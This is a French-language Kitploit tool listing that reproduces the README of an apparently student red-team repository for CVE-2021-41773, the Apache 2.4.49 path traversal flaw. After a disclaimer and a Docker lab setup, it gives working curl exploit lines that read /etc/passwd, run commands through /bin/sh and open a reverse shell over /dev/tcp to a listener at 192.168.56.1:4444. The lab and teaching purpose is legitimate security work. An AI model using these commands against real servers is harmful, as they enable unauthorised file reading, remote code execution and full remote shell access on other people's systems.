Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Traversée de chemin RCE | Kitploit
Outils/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Traversée de chemin RCE

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41773 — Serveur HTTP Apache 2.4.49 — Traversée de chemin / RCE

Département Cybersécurité ITSOLERA — Tâche Red Team n°3
Équipe : Offensive Team Zeta
Date : 18 mars 2026


⚠️ Avertissement

Ce dépôt est uniquement à des fins éducatives.
Tous les tests ont été effectués dans un laboratoire Docker local isolé.
Ne l'utilisez jamais contre des systèmes réels, en production ou appartenant à des tiers.


Résumé de la CVE

ChampDétail
Identifiant CVECVE-2021-41773
Score CVSS9.8 CRITIQUE
Version concernéeServeur HTTP Apache 2.4.49 UNIQUEMENT
TypeTraversée de chemin + Exécution de code à distance
Corrigé dansApache 2.4.51

Contenu du dépôt

FichierDescription
poc_41773.pyScript d'exploitation PoC en Python avec bannière Team Zeta
docker-compose.ymlConfiguration de l'environnement de laboratoire vulnérable
offensive_zeta_shell.txtJournal de session en direct — preuve de l'exploitation
screenshots/Captures d'écran de preuve
Offensive_Team_Zeta_FINAL_Report.pdfRapport complet d'exploitation

Configuration du laboratoire

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Exploitation

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Télécharger l’outil